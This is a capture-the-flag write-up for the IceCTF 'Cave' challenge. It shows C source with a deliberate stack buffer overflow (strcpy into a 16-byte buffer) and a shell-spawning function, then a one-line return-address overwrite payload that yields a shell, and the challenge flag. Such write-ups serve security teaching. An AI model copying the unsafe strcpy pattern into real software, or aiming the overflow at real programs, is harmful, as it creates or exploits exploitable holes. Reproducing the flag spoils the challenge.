Recently Updated
Cave
Challenge
You stumbled upon a cave! I’ve heard some caves hold secrets.. can you find the secrets hidden within its depths?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
void shell() {
gid_t gid = getegid();
setresgid(gid, gid, gid);
system("/bin/sh -i");
}
void message(char *input) {
char buf[16];
strcpy(buf, input);
printf("The cave echoes.. %s\n", buf);
}
int main(int argc, char **argv) {
if (argc > 1){
message(argv[1]);
} else {
printf("Usage: ./shout <message>\n");
}
return 0;
}
Solution
Another buffer overflow challenge, this time we need to overwrite the return address to call the shell()
function. First we need to find out what that address should be, we can do this with gdb’s info functions shell
or objdump -d ./shout | grep shell
and find out that the address is 0x0804850b
So we need to overwrite the return address with this address, in little endian order:
1
./shout `python -c "print('a'*28+'\x0b\x85\x04\x08')"`
this gives us a root shell and we can read the contents of flag.txt
to read our flag:
Flag
1
IceCTF{i_dont_think_caveman_overflowed_buffers}
Flag
IceCTF{i_dont_think_caveman_overflowed_buffers}